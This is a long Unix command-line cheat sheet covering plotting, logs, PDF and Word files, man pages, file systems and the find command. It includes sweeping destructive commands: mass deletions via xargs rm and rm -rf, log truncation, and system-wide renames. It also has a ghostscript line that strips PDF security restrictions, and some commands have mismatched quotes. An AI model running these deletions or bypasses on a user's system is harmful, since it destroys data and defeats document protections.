 echo "set t png; set o 'o.png'; p sin(x)" | gnuplot; feh o.png

plot a parabola from the bash shell

 echo 'plot x**2' | gnuplot -persist

plot some data from the command line

 echo 'plot "list.txt" using 2:xticlabels(1)' | gnuplot -persist

show the graph of 'parabola' curve (x to the power of 2)

 plot x**2

Dot ‹↑›

Generate a graph of package dependencies

 apt-cache dotty apache2 | dot -T png | display

Flow Charts And Figures ‹↑›

for drawing flow charts and other figures use


Video ‹↑›

please see for more complete information about using video with the linux operating system.

Log Files ‹↑›

In Unix and Linux 'log' files are used by software to record things that it has done or happened to it. In particular, server software makes great use of log files. These log files are always stored as plain text.

Truncate logs in unix

 logs=$(find . -name *.log);for log in $logs; do cat /dev/null > $log;done

Get all possible problems from any log files

 grep -2 -iIr "err\|warn\|fail\|crit" /var/log/*

Follow the most recently updated log files

 ls -drt /var/log/* | tail -n5 | xargs sudo tail -n0 -f

Quickly analyze apache logs for top 25 most common IP addresses.

 cat $(ls -tr | tail -1) | awk '{ a[$1] += 1; } END { for(i in a) printf("%d, %s\n", a[i], i ); }' | sort -n | tail -25

Extract XML from an otherwise plain text log file

 sed -n '/<Tag>/,/<\/Tag>/p' logfile.log

Convert the output of one or more (log, source code ...) files

 enscript -E --color -t "title" -w html --toc -p /PATH/to/output.html /var/log/*log

tail, with specific pattern colored

 tail -F file | egrep --color 'pattern|$'

Watch several log files in a single window

 multitail /var/log/messages /var/log/apache2/access.log /var/log/

A robust, modular log coloriser


useful tail on /var/log to avoid old logs or/and gzipped files

 tail -f *[!.1][!.gz]

Export log to html file

 cat /var/log/auth.log | logtool -o HTML > auth.html

follow the end of the log file 'tcp.log' showing new data as it enters

 less +F tcp.log   press [control] c to stop following
 tail -f tcp.log   the same, but you cant move up and down the file
 tailf tcp.log     the same

Monitor logs in Linux using Tail

 find /var/log -type f -exec file {} \; | grep 'text' | cut -d' ' -f1 | sed -e's/:$//g' | grep -v '[0-9]$' | xargs tail -f

Ms Word Documents ‹↑›

extract plain text from MS Word docx files

 unzip -p some.docx word/document.xml | sed -e 's/<[^>]\{1,\}>//g; s/[^[:print:]]\{1,\}//g'

find and grep Word docs

 find . -iname '*filename*.doc' | { while read line; do antiword "$line"; done; } | grep -C4 search_term;

view a microsoft word document


convert a ms word document to text

 antiword, catdoc

display the 'list.doc' file as plain text

 catdoc list.doc | less

convert the Word file 'resume.doc' to LaTeX

 word2x -f latex resume.doc writes a new file, 'resume.ltx',

convert all of the '.DOC' Word files in the current directory to LaTeX files with maximum line widths of 40 characters

 word2x -f latex -w 40 *.DOC

convert the Word file 'resume.doc' to a plain text file called 'resume'

 word2x -f text resume.doc resume

search the text of the Word file 'resume.doc' for the string 'linux' regardless of case

 word2x resume.doc - | grep -i linux

Postscript Documents ‹↑›

Postscript is a document format very well suited to being printed. However it is more difficult to view than the adobe pdf format (since the acrobat viewer is more widely installed on Microsoft Windows computers)

view a ps file


view a postscript file

 gv       the same

view a postscript file as plain text

 ps2ascii | less

Converting Postscript To Other Formats ‹↑›

convert a postscript document to the pdf format

 ps2pdf   a file called "eg.pdf" is created

convert a postscript file to plain text


Pdf Documents ‹↑›

debian packages: xpdf, xpdf-utils

home page for the pdf-utils programs
graphing tools
picviz - plotter for parallel co-ordinates

Merge *.pdf files

 gs -q -sPAPERSIZE=letter -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOutputFile=out.pdf `ls *.pdf`

Merge several pdf files into a single file

 pdftk $* cat output $merged.pdf

create a pdf of the file 'test.txt'

 enscript test.txt -o - | ps2pdf - ~/tmp/test.pdf

create a pdf of a directory listing of the current folder

 ls | enscript -o - | ps2pdf - ~/tmp/ls.pdf

Convert images to a multi-page pdf

 convert -adjoin -page A4 *.jpeg multipage.pdf

Get pages number of the pdf file

 pdfinfo file.pdf | awk /Pages/

Save man pages to pdf

 man -t man | ps2pdf - > man.pdf

separate a pdf document into single pages and report its data

 pdftk mydoc.pdf burst

Merge Two or More PDFs into a New Document

 pdftk 1.pdf 2.pdf 3.pdf cat output 123.pdf

Optimize Xsane PDFs

 gs -q -sPAPERSIZE=a4 -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOutputFile=test.pdf multipageproject.pdf

Merge several pdf files into a single file

 gs -q -sPAPERSIZE=a4 -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOutputFile=out.pdf a.pdf b.pdf c.pdf

Remove security limitations from PDF documents using ghostscript

 gs -q -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOutputFile=OUTPUT.pdf -c .setpdfwrite -f INPUT.pdf

Viewing Pdf Documents ‹↑›

view a pdf file as plain text

 pdftotext file.pdf - | less

view a compressed pdf document

 zxpdf book.pdf.gz

view a pdf document

 xpdf book.pdf       xpdf appears much faster than "acroread"
 acroread book.pdf   its easier to select text in acroread

view the 10th page of a pdf document with a zoom factor of 200%

 xpdf -z 200 book.pdf 10

view a pdf document in "continuous" mode starting at the 5th page

 xpdf -cont book.pdf 5  one can scroll smoothly through the whole file

view a pdf document in full-screen mode

 xpdf -fullscreen book.pdf the -z zoom option doesnt work with fullscreen

view a pdf document with the colours reversed (usually white text on black)

 xpdf -rv book.pdf

Analyse Pdf Documents ‹↑›

extract the images from the file and save them in jpeg format

 pdfimages -j report.pdf

display information about a pdf document

 pdfinfo book.pdf

show how many pages a pdf document has

 pdfinfo book.pdf | sed -n "/Pages:/s/^ *Pages: *//p"

show the page size of a pdf document

 pdfinfo book.pdf | grep -i "Page size:"

show what fonts are used in a pdf document

 pdffonts book.pdf

Editing Pdf Files ‹↑›


Converting Pdf To Images ‹↑›

some hints on converting to another format
The 'convert' tool forms part of the imagemagick suite of tools

convert 'file.pdf' to a low quality 'png' format image

 convert file.pdf file.png

convert 'file.pdf' to a high quality 'png' format image

 convert -density 300 file.pdf file.png

convert 'file.pdf' to a high quality 'jpeg' format image

 convert -density 300 file.pdf file.jpg

convert 'file.pdf' to a high quality jpeg, cropping all whitespace

 convert -density 300 -trim file.pdf file.jpg
 convert -density 300 -trim +repage file.pdf file.jpg  the diff?

Note: if the pdf file contains page numbers, then the -trim function will probably not work as well as you were hoping.

Convert PDF to JPEG using Ghostscript

 gs -dNOPAUSE -sDEVICE=jpeg -r144 -sOutputFile=p%03d.jpg file.pdf

Pdf To Postscript ‹↑›

make a copy of 'file.pdf' in postscript format called ''

 pdftops file.pdf

Pdf To Text ‹↑›

convert a pdf document to plain text (without any formatting)

 pdftotext file.pdf  a file called "file.txt" is created

convert the pdf file "file.pdf" to a plain text file "ouput.txt"

 pdftotext file.pdf output.txt
 ps2ascii file.pdf output.txt  more or less the same


From Other Formats ‹↑›

convert a web page into a pdf

 touch $2;firefox -print $1 -printmode PDF -printfile $2

The Info Help Reader ‹↑›

Nice info browser


The info reader.

For some incomprehensible reason, the people decided that they didnt like "man" pages and so they invented a whole new help document reader called "info". Its a nasty little second rate hypertext viewer which forces you to learn a whole new set of arbitrary keystrokes in order to move around the document (maybe they're "emacs" keystrokes, who knows). Whats more, instead of just calling "pages" pages, info calls pages "nodes" to try and be as pretentious as it possibly can. But anyway, you may have to use it.

view the "info" help document for Latex

 info latex

useful pdf programs
evince - view a pdf or postscript file
xpdf - view a pdf file
pdftops - convert to postscript
pdftotext - convert or view a pdf file as plain text
pdfinfo - display lots of information about a pdf document
pdfimages - extract images from pdffiles
pdffonts - show what fonts are used in a pdf document
pdftoppm -
xpdfrc -
pdfcrack - PDF files password cracker
pdfjam - collection of PDF document handling utilities
pdftk - A useful tool for manipulating PDF documents
pdftohtml - Translates PDF documents into HTML format

Man Pages ‹↑›

'man' (manual) pages are the traditional Unix way to document a program, command or package. They are text files with simple 'markup' codes which are then processed by the troff tool.

Colorful man

 /usr/bin/man man | /usr/bin/col -b | /usr/bin/iconv -c | view -c 'set ft=man nomod nolist nospell nonu

see the conventions for writing a man page

 man 7 man

view a compressed man page in section 1 in its raw plain text format

 zcat /usr/share/man/man1/zless.1.gz | less
this may be useful if you wish to write a man page

see where the 'man' command searches for man pages


list all the directories in the man pages path

 ls $(manpath | tr ':' ' ')

Some "info" reader commands
[space] move forward a page
[del] move back a page, or to the previous node if at the top of the page
q exit the Info document viewer
? show some keystrokes which are available
h show an "info" tutorial, if available
[tab] go to the next link on the page
[enter] jump to the link under the cursor
??? how to go to previous link is anyones guess [M-TAB] ???
l go to the last page that was viewed (like a browser "back button")
n open the next page in the document
p open the previous page in the document
u go "up" one level in the document (usually to a table of contents)
t go to the main table of contents for the document
d view a list of all Info documents
b go to the top of the current page
e go to the end of the current page
m type the name of a link to jump to (can type partial names)
i type the name of any node to jump to
/ search for a string in the current page

automatically generate man pages from C, C++, Java, Python ... source code

 doxygen   doxygen can also generate documentation in html, latex etc

a cgi script for generating html man pages


save the word count tool (wc) man page as plain text

 man wc | col -b > wc.txt

Documentation Systems ‹↑›

groff texinfo docbook, halibut

Source Code Documentation Systems ‹↑›

doxygen javadoc pod perl documentation

Xml ‹↑›

check if an xml or html document is well formed (valid)

 curl -s '' > bcc.html; xmlwf bcc.html
'xmlwf' is part of the 'expat' package

Editing Text ‹↑›

In the traditional unix world, the choice of text editor is often seen as a choice between vim and emacs. But many other good choices exist.

www: tea
- ?
www: sam
An editor written by Rob Pike which is in turn used by various veteran unix forefathers. Sam makes more use of the mouse.
www: acme
Another editor by Rob Pike.
www: joe
'joes own editor' possibly the simplest text editor to use ...
www: nano,
pico small reasonably easy to use text editors originating from the pine email program.
www: vim
'visual editor improved' this is a programmers' editor for people who write a great deal of text and preferibly can type without looking at the keyboard. It is strange and annoying for new users.
www: emacs
'editing macros' capable of just about anything but dont use it, because I think its bad.

graphical text editors

Batch Editing Text Files ‹↑›

Batch editing of text files involves editing several or many text files at once, usually in a non-interactive way.

o- - use vim with the "argdo" function - use perl with the "-i" switch - some versions of "sed" do not have the "-i" switch, so perl must be used -

## Before doing a "batch" edit of text files, it is probably a good ## idea to check what changes will take place without doing anything

add the word "green" after the 500th line of the file "report.txt"

 echo -e "500a\ngreen\n.\nw\nq\n" | ed report.txt
 (echo "500a"; echo "green"; echo -e "w\nq\n") | ed report.txt the same

In all files with a ".txt" extension replace "Daniel" with "Dan"

 grep -l "Daniel" $(find . -name "*.txt") | xargs sed -n "s/Daniel/Dan/p"
the original files are left unchanged

# using the sed -n and "p" commands, only changed lines will be displayed

In all files with a ".txt" extension replace "Daniel" with "Dan"

 grep -l "Daniel" $(find . -name "*.txt") | xargs sed -i.bak "s/Daniel/Dan/g"

In "html" files, NOT containing the text "Notes:", add a line with "Notes:"

 grep -L "Daniel" $(find . -name "*.html") | xargs sed -i.bak "$s/$/\nNotes:/"
a copy of the changed files is made with an extension ".bak"all files in the current folder and subfolders are affected

replace the word "big" with small in all files in this and subfolders

 perl -p -i.bak -e 's/\bbig\b/small/g' $(grep -ril big *)

Unix Directory Structure ‹↑›

Unix has a standard folder hierarchy in which each folder is designed to serve a specific purpose and contain certain sorts of files.

search google: unix file system standard linux file system standard FS-Stnd

show detailed information about what each folder is used for

 man hier

man sections
1 user commands executable from a shell
2 kernel system calls
3 library functions and calls (such as libc)
4 special files such as in /dev
5 file formats and conventions (such as /etc/password)
6 games
7 conventions and miscellaneous, file system layout.
8 system management commands such as like mount(8)
9 kernel routines. this is an obsolete manual section.

Fonts ‹↑›

Refresh the cache of font directory

 sudo fc-cache -f -v

show which fonts are installed

 fc-list | cut -d ':' -f 1 | sort -u

show what fonts are installed for the japanese language

 fc-list :lang=ja

Installing True-Type fonts

 ttmkfdir mkfontdir fc-cache /usr/share/fonts/miscttf

A very incomplete summary of the Unix directory structure
/usr/bin/ - executable files (binary shell scripts etc)
/usr/sbin/ - secure executable files
/usr/local/bin - executables only on the current machine
/usr/share/ - files used by many programs dictionaries, icons etc
/usr/share/doc - documentation files
/var/ - data files which change regularly (eg log files)
/dev/ - peripheral devices (sound cards usb drives etc)
/etc/ - configuration files for programs

File Systems ‹↑›

Force file system check

 touch /forcefsk

Backup files incremental with rsync to a NTFS-Partition

 rsync -rtvu --modify-window=1 --progress /media/SOURCE/ /media/TARGET/

www: gparted
a graphical partitioner and file-system formatter
www: fdisk
a command line tool
Check the age of the filesystem
 df / | awk '{print $1}' | grep dev | xargs tune2fs -l | grep create

currently mounted filesystems in nice layout

 column -t /proc/mounts

Converts ext2 to ext3

 tune2fs -j /dev/sdX

migrate existing ext3 filesystems to ext4

 tune2fs -O extents,uninit_bg,dir_index /dev/yourpartition

Show the UUID of a filesystem or partition

 sudo vol_id -u /dev/sda1

resize a mounted ext3 file system

 v=/dev/vg0/lv0; lvextend -L+200G $v && resize2fs $v

Iso Files ‹↑›

convert .daa to .iso

 poweriso convert image.daa -o image.iso -ot iso

Create a CD/DVD ISO image from disk.

 readom dev=/dev/scd0 f=/path/to/image.iso

Mount a .iso file in UNIX/Linux

 mount /path/to/file.iso /mnt/cdrom -oloop

convert .bin / .cue into .iso image

 bchunk IMAGE.bin IMAGE.cue IMAGE.iso

Mount and umount iso files

 function miso () { mkdir ~/ISO_CD && sudo mount -o loop "$@" ~/ISO_CD && cd ~/ISO_CD && ls; } function uiso () { cd ~ && sudo umount ~/ISO_CD && rm -r ~/ISO_CD; }

Partitions ‹↑›

A partition is a way of dividing a hard-disk or other storage media into several logical 'disks'.

Mount a partition from within a complete disk dump

 INFILE=/path/to/your/backup.img; MOUNTPT=/mnt/foo; PARTITION=1; mount "$INFILE" "$MOUNTPT" -o loop,offset=$[ `/sbin/sfdisk -d "$INFILE" | grep "start=" | head -n $PARTITION | tail -n1 | sed 's/.*start=[ ]*//' | sed 's/,.*//'` * 512 ]

File System Types ‹↑›

a good chronological table of file systems
an article about the vfat file system
font tools
gucharmap - browse the fonts on the computer
waterfall - show characters from a font in all sizes

view all mounted file system types

 df -T

Mounting And Unmounting Filesystems ‹↑›

Mount proc

 mount -t proc{,,}

currently mounted filesystems in nice layout

 mount | column -t

Mount a temporary ram partition

 mount -t tmpfs tmpfs /mnt -o size=1024m

Mount folder/filesystem through SSH

 sshfs name@server:/path/to/folder /path/to/mount/point

Mount a partition from within a complete disk dump

 lomount -diskimage /path/to/your/backup.img -partition 1 /mnt/foo

umount all nfs mounts on machine

 umount -a -t nfs

mount directories in different locations

 mount --bind /old/directory/path /new/directory/path

Symbolic Links ‹↑›

Find broken symlinks and delete them

 find -L /path/to/check -type l -delete

Find broken symlinks

 find . -type l ! -exec test -e {} \; -print

Propagate a directory to another and create symlink to content

 lndir sourcedir destdir

show the status of all symlinks in the current folder

 symlinks -r $(pwd)

List all symbolic links in current directory

 find /path -type l

Find dead symbolic links

 find . -type l | perl -lne 'print if ! -e'

Show the disk usage for files pointed to by a symbolic link

 find /usr/lib -maxdepth 1 -type l -print0 | xargs -r0 du -Lh

Eliminate dead symlinks interactively in /usr/ recursevely

 find /usr/ -type l ! -xtype f ! -xtype d -ok rm -f {} \;

Get the canonical, absolute path given a relative and/or

 readlink -f ../super/symlink_bon/ahoy

Directories ‹↑›

Directories, which are also known as 'folders' are a way of organising files in a heirarchical kind of way.

Push your present working directory to a stack that you can pop

 pushd /tmp

display the folder below the current one

 tree -dL 1 | less

display the whole directory tree below the current folder

 tree -d | less

another directory tree

 find . -type d -print | sed -e 's;[^/]*/;..........;g'| awk '{print $0"-("NR-1")"}'

Go to parent directory of filename edited in last command

 cd `dirname $_`

Convert the contents of a directory listing into a colon-separated

 find . -name '*' -printf '%f:'

find and delete empty directories recursively

 find . -depth -type d -empty -exec rmdir -v {} +

Find the 20 biggest directories on the current filesystem

 du -xk | sort -n | tail -20

Get the size of all the directories in current directory

 du --max-depth=1

Replicate a directory structure dropping the files

 for x in `find /path/ -type d | cut -b bytesoffoldername-`; do mkdir -p newpath/$x; done

Go to the next sibling directory in alphabetical order

 for d in `find .. -mindepth 1 -maxdepth 1 -type d | sort`; do if [[ `basename $d` > `basename $PWD` ]]; then cd $d; break; fi; done

maybe the quickest way to get the current program name minus the path


Huh? Where did all my precious space go ?

 ls -la | sort -k 5bn

fast access to any of your favorite directory.

 alias pi='`cat ~/.pi | grep ' ; alias addpi='echo "cd `pwd`" >> ~/.pi'

Remove empty directories

 find . -type d -empty -delete

Count the total number of files in each immediate subdirectory

 find . -type f -printf "%h\n" | cut -d/ -f-2 | sort | uniq -c | sort -rn

Browsing Folders ‹↑›

Start a file browser in the current directory

 screen -d -m nautilus --no-desktop `pwd`

File browser in the dwm minimalist window manager

 xdg-open $(ls -1 . | dmenu)

browse the current folder with the gnome file manager


Restart nautilus, the gnome file manager

 killall nautilus

Analysing Directories ‹↑›

list hidden files and folders in the current folder

 ls -d .*

List only the directories

 ls -l | egrep ^d

Sort the size usage of a directory tree by gigabytes, kilobytes,

 dh() { du -ch --max-depth=1 "${@-.}"|sort -h }

a few common file-system types
fat32 - created 1996 by microsoft, appeared in windows 95b
vfat - ?
ntfs v5.1 - created 2001 by microsoft and used in windows xp
ntfs v6 - 2006 by microsoft for windows vista
ext2 - created in 1993 and used by linux and hurd
ext3 - created 1999 used in linux
reiserfs - created 2001 by namesys used in linux
google file system - created 2003 by google for linux
gfs2 - 2006 by red hat for linux
ext4 - 2006 for linux

Folder Size ‹↑›

Watch the size of a directory using figlet

 watch -n1 "du -hs /home/$USER | cut -f1 -d'/' | figlet -k"

show the total size of the current directory

 du -sh

display disk usage for the current folder in a readable form

 du -sh *    displays values such as 2G, 43K, 12M etc

show available disk space in a readable form (2G, 42K etc)

 df -h

Print the 10 deepest directory paths

 find . -type d | perl -nle 'print s,/,/,g," $_"' | sort -n | tail

Comparing Folders ‹↑›

Recursively compare two directories and output their differences

 diff -urp /originaldirectory /modifieddirectory

Making Folders ‹↑›

make directory tree

 mkdir -p work/{d1,d2}/{src,bin,bak}

make 100 directories with leading zero, 001...100, using bash3.X

 mkdir $(printf '%03d\n' {1..100})

Changing Folders ‹↑›

Go up multiple levels of directories quickly and easily.

 alias ..="cd .."; alias ...="cd ../.."; alias ....="cd ../../.."

go to the previous directory

 cd -

go to the users home directory


go to the previous sibling directory in alphabetical order

 cd ../"$(ls -F ..|grep '/'|grep -B1 `basename $PWD`|head -n 1)"

Copying Folders ‹↑›

Recursively move folders/files and preserve their permissions and

 cd /source/directory; tar cf - . | tar xf - -C /destination/directory

copy/mkdir and automatically create parent directories

 cp --parents /source/file /target-dir

create a copy of the 'book' folder as 'book-bak'

 cp -r book book-bak

copy a folder, but only newer files and display all files copied

 cp -vur book book-bak

copy a directory to another, only where files are newer

 cp -ru sourcefolder targetfolder
or use the 'rsync' tool instead of 'cp'

make a folder and create parent folders if necessary

 mkdir -p ./new/path/
if the folder './new' doesnt exist it will also be created

Deleting Folders ‹↑›

take a look to command before action

 find /tmp -type f -printf 'rm "%p";\n'

remove a directory

 rm -r folder      where the dir is not empty: be careful

make an archive of a the folder 'tree' excluding .exe files

 tar -cvz --exclude *.exe -f folder.tar.gz tree

File Type Conversions ‹↑›

disk usage tools
firelight - a graphical tool

Files ‹↑›

Create a bunch of dummy files for testing

 touch {1..10}.txt

Empty a file

 > foobar.txt

list all open files

 lsof   this lists all open file, pipes, sockets etc
 lsof -i TCP  show open TCP sockets

show the number of open files for the root user

 lsof | grep ' root ' | awk '{print $NF}' | sort | uniq | wc -l
 lsof | grep ' root ' | awk '{print $NF}' | sort -u | wc -l   the same

find out what sort of file is 'mys' (i.e. what is the file type)

 file mys

show the last modification time of a file or folder

 date -r file

File Size ‹↑›

Alternative size (human readable) of files and directories

 du -ms * | sort -nk1

Another way to calculate sum size of all files matching a pattern

 find . -iname '*.jar' | xargs du -ks | cut -f1 | xargs echo | sed "s/ /+/g" | bc

Analysing Files ‹↑›

Find files that were modified by a given command

 strace <name of the program>

Sum size of files returned from FIND

 find [path] [expression] -exec du -ab {} \; | awk '{total+=$0}END{print

list files with last modified at the end

 alias lrt='ls -lart'

Find writable files

 find -writable

list and sort files by size in reverse order (file size in human

 ls -S -lhr

Get file access control list

 getfacl /mydir

Show latest changed files

 ls -ltcrh

Sort files by size

 ls -l | sort -nk5

Find Duplicate Files (based on size first, then MD5 hash)

 find -not -empty -type f -printf "%s\n" | sort -rn | uniq -d | xargs -I{} -n1 find -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate

File Names ‹↑›

Substitute spaces in filename with underscore

 ls -1 | rename 's/\ /_/'

Copying Files ‹↑›

File Type Conversion Programs
dvips tex/latex dvi --> postscript
ps2pdf postscript --> adobe pdf
ghostscript postscript --> gif image
groff groff-pic --> postscript

find and copy scattered mp3 files into the users images folder

 find ~ -iname '*.mp3' -type f -print0 | xargs -I{} -0 cp {} ~/images

prevents replace an existing file by mistake

 set -o noclobber

Copy all documents PDF in disk for your home directory

 find / -name "*.pdf" -exec cp -t ~/Documents/PDF {} +

Create subdirectory and move files into it

 (ls; mkdir subdir; echo subdir) | xargs mv

File Paths ‹↑›

For a $FILE, extracts the path, filename, filename without

 FILENAME=`echo ${FILE##*/}`;FILEPATH=`echo ${FILE%/*}`;NOEXT=`echo ${FILENAME%\.*}`;EXT=`echo ${FILE##*.}`

Get the full path to a file

 realpath examplefile.txt

get the top 10 longest filenames

 find | sed -e "s/^.*\///" | awk ' BEGIN { FS=""} { print NF " " $0 } ' | sort -nrf | head -10

Get the absolute path of a file

 absolute_path () { readlink -f "$1"; };

Searching For Files And Directories ‹↑›

This section covers techniques to search for and find files and folders on a Unix system. This mainly involves using the "find" program from the command line. This program is flexible and useful, but its syntax can initially seem to be unnecessarily complicated. For example "find filename" will not work.

The 'find' tool has an enormous number of options and operators to construct truly abstruse find commands.

a find tutorial
Graphical search tools: Beagle, Google desktop

## for some reason find / -name "*.c" doesnt search all subfolders for me ## for this reason I use the syntax ## find /* ....

do a full file listing of every file found with locate

 locate searchstring | xargs ls -l

allow the user to select a file and print the chosen file

 zenity --file-selection --title 'select a file'

Find all directories on filesystem containing more than 99MB

 du -hS / | perl -ne '(m/\d{3,}M\s+\S/ || m/G\s+\S/) && print'

find all files with "tree" in the name in the current folder and subfolders

 find . -iname "*tree*"

Searching files

 find /dir/ -name *name*

best command for searching files

 find / -name \*string\*

Search through files, ignoring .svn

 find . -not \( -name .svn -prune \) -type f -print0 | xargs --null grep <searchTerm>

search the contents of '.c' and '.h' file types recursively

 find . -name "*.[ch]" | xargs grep "TODO"

Searching For Folders ‹↑›

find all directories in the system

 find /* -type d        the -print action is assumed
 find /* -type d -print the same as above
 find / -type d         on many computer the "*" may not be required

show all folders in the current folder

 find -maxdepth 1 -type d

find all subdirectories and print the full path name

 find $(pwd) -type d | less

find all directories which begin with a '.'

 find / -type d -name .\* -print
 find /* -type d -name .\* -print
for some reason the "/*" idiom is necessary on my computer

Finding Files By Name ‹↑›

find all c code files on the computer

 find /* -iname "*.c"   -iname does a case insensitive name search

find files in the current and subfolder with a ".txt" filename extension

 find . -name "*.txt"   this will find "index.txt" but not "index.TXT"

find all files whose names end with '.txt' or '.csv'

 find . -name "*.txt" -o -name "*.csv"
-o is the logical 'or' operator

 find . -name '*.txt' -o -name '*.csv'
the same, but not always

 find / -regex ".*\.\(xls\|csv\)"
the same, but a bit messy

find all files whose names end with '.txt' or '.csv' case insensitive

 find / -iregex ".*\.\(xls\|csv\)"       finds a.CSV, b.Xls, C.csV etc
 find . -iname "*.txt" -o -iname "*.csv" the same

find files which have 'tree' somewhere in the path or name

 find . -wholename '*tree*'
 find . -path '*tree*'  the same, but deprecated

find all non-html files

 find . -type f ! -name "*html"

Searching For Files By Size ‹↑›

Sort file greater than a specified size in human readeable format

 find ./ -size +10M -type f -print0 | xargs -0 ls -Ssh1 --color

Get the 10 biggest files/folders for the current direcotry

 du -sk * |sort -rn |head

Find all the files more than 10MB, sort in descending order of

 find . -size +10240k -exec ls -l {} \; | awk '{ print $5,"",$9 }'|sort -rn > message.out

find files which are larger than 10 megabytes

 find / -size +10000000c -print
 find / -size +10M     the same but shorter and more readable

find files which are larger than 10 kilobytes

 find / -size +10k     the same but better

show file sizes in a readable format for all files bigger than 100k

 find . -size +100k -print | xargs du -sh | less
searches this & subfolders

 find . -size +100k | xargs du -sh | less        the same

delete all files in the current and subfolder which are bigger than 100k

 find . -size +100k | xargs rm | less   rather dangerous this command!

a bash function which finds files bigger than an amount of meg

   function bigger {
    [ -z "$1" ] && echo "usage: $FUNCNAME filesize" && return 3
      find . -size +${1}M | xargs du -sh | less

List top ten files/directories sorted by size

 du -sb *|sort -nr|head|awk '{print $2}'|xargs du -sh

Finding Files By Modification Time ‹↑›

show files in the home folder which have been modified in the last 24 hours

 find $HOME -mtime 0

find all files which have been modified in the last 7 days

 find / -mtime -7 -print
 find /* -mtime -7 -print   works better for me

remove files in the /tmp folder which havent been modified in a week

 find /tmp -mtime +7 -exec rm -rf {} \;
 find /tmp -mtime +7 | xargs rm -rf  the same but nicer and maybe faster

compress log files which havent been modified for a week

 find /var/log -mtime +7 -exec gzip {} \;

find files which were last modified (the data) more than 30 minutes ago

 find . -mmin +30

find files whose data was modified less than 30 minutes ago

 find . -mmin -30

files which were modified more recently than 'tree.txt'

 find . -newer tree.txt

By Access Time ‹↑›

find all files in the current folder tree accessed exactly 10 minutes ago

 find . -amin 10

find files accessed more than 10 minutes ago

 find . -amin +10

find files accessed less than 10 minutes ago

 find . -amin -10

find files which were accessed after the file 'tree.txt' was modified

 find . -anewer tree.txt

find files which were last accessed more than 48 hours ago

 find . -atime +2

find files which were last accessed less than 48 hours ago

 find . -atime -2

By File Type ‹↑›

find all empty files and folder in this and all subfolders

 find . -empty

find all executable files (not folders)

 find . -type f -executable

find all image files on the computer

 find / | xargs file | grep image | less

Finding Text Files ‹↑›

find files which contain the word 'big' in this folder and subfolders

 find . -type f -print | xargs grep -l big
 grep -rl big *  this is the same but not all greps have the 'r' option

find all files having the phrase 'big boy' in the 'doc/books' folder tree

 grep -rl 'big boy' doc/books    this is a case sensitive search
 grep -ril 'big boy' doc/books   finds 'big boy', 'BiG Boy' etc
 grep -sril 'big boy' doc/books  dont show any error messages
 grep -sri 'big boy' doc/books  show matching lines, not just filenames

find all ".html" files in "/etc" which do *not* contain the "<img" tag

 find /etc -iname "*.html" | xargs grep -L "<img"

find all files with names ending in '.html' or '.php' containing the word 'big'

 find / \(-name \*.html -o -name \*.php\) | xargs grep -i "big"
this uses the tool 'xargs' instead of a 'for' loop

find all text files in the current directory and all subfolders

 find . | perl -lne '-T "$_" and print "$_"' | less
 find . | perl -lne '-T $_ and print $_' | less  the same, I think...

Finding Files By Permissions ‹↑›

find files not readable by all users

 find -type f ! -perm -444

find folders which are not accessible for all users

 find -type d ! -perm -111

Complex Find Expressions ‹↑›

Find can use logical operators on each condition. This makes it possible to construct complex, and hopefully powerful find commands.

find all files ending in '.csv' which are real files and list them

 find / -type f -name "*.csv"
 find / -type f -a -name "*.csv"  the same, '-a' means logical and

use the 'and' logical operator

 find / -type f -a -name "*.csv"  the -a is not necessary

use the 'or ' logical operator: find files ending in .txt or .csv

 find / -name '*.txt -o -name "*.csv"

find files ending in '.xls' or '.csv' which are real files (not folders etc)

 find / -type f \( -name "*.xls" -o -name "*.csv" \) -exec ls -l {} \;

find all files whose names dont end in '.csv'

 find . \! -name '*.csv'

Doing Something With Found Files ‹↑›

Find also support the -exec option which performs an action on each found file, but it may be better to use 'xargs' instead for speed

 find / -type f \( -name "*.xls" -o -name "*.csv" \) -exec ls -l {} \;

the -exec option can be used to carry out an action on the found files

 find . -name "*" -exec cp "{}" img \;

delete all files whose names end in '.txt' in this and all subfolders

 find . -name '*.txt' -delete         a bit dangerous, but anyway
 find . -name '*.txt -exec rm {} \;   the same, if you like typing
 find . -name '*.txt -exec rm "{}" \; better? but why
 find . -name '*.txt | xargs rm       the same, might be faster, who knows

delete each file but ask the user for confirmation

 find . -name '*.txt' -ok rm {} \;
 find . -name '*.txt' -ok rm "{}" \;         better

display the file type information about each file in this folder tree

  find . -type f -exec file '{}' \;

Locating Files ‹↑›

The 'locate' tool is faster than find, because it use an 'index' which has to be updated when the filesystem changes.

use locate,

update the file name database for the locate command


find all executable files in the current and subfolder with 'tree' in the name

 find . -name "*tree*" | perl -lne '-x and print'
 find . -name "*tree*" | perl -lne '-x && print'          the same
 find . -name "*tree*" | perl -lne '-x $_ and print $_'   the same

Renaming And Moving Files ‹↑›

smart renaming of files

 ls | sed -n -r 's/banana_(.*)_([0-9]*).asc/mv & banana_\2_\1.asc/gp' | sh

convert filenames in current directory to lowercase

 for i in *; do mv "$i" "$(echo $i|tr A-Z a-z)"; done

recursively change file name from uppercase to lowercase (or

 find . -type f | while read f; do mv $f `echo $f |tr '[:upper:]' '[ :lower:]'`; done

Replace space in filename

 rename "s/ *//g" *.jpg

Rename .JPG to .jpg recursively

 find /path/to/images -name '*.JPG' -exec rename "s/.JPG/.jpg/g" \{\} \;

rename all '.html' files in the folder to '.php'

 rename 's/\.html$/.php/' *.html  index.html will become index.php

rename uppercase file names to lower-case

 rename 'y/A-Z/a-z/' *

show what renaming would happen but dont actually do anything

 rename -n 's/\.htm$/.html/' *.html

rename all files on the entire computer from "htm" -> "html"

 find /* -name "*.htm" | xargs rename 's/\.htm$/.html/'
 find /* -name "*.htm" -exec rename 's/\.htm$/.html/' "{}" \;  slower

# the "xargs" version is much much faster than the "-exec" version # using "xargs -I {} cmd {} " slows down xargs alot # in this case.

Batch file name renaming (copying or moving) w/ glob matching.

 for x in *.ex1; do mv "${x}" "${x%ex1}ex2"; done

get only the first component of a Unix style file name

 f=/user/home/hh.html; echo f  | sed "s*^/**" | cut -d '/' -f 1
this prints "user"

Deleting Files ‹↑›

delete files except some file

 find . |more |grep -v filename |xargs rm

Removes file with a dash in the beginning of the name

 rm -- --myfile

List and delete files older than one year

 find <directory path> -mtime +365 -and -not -type d -delete

Delete files if not have some extension

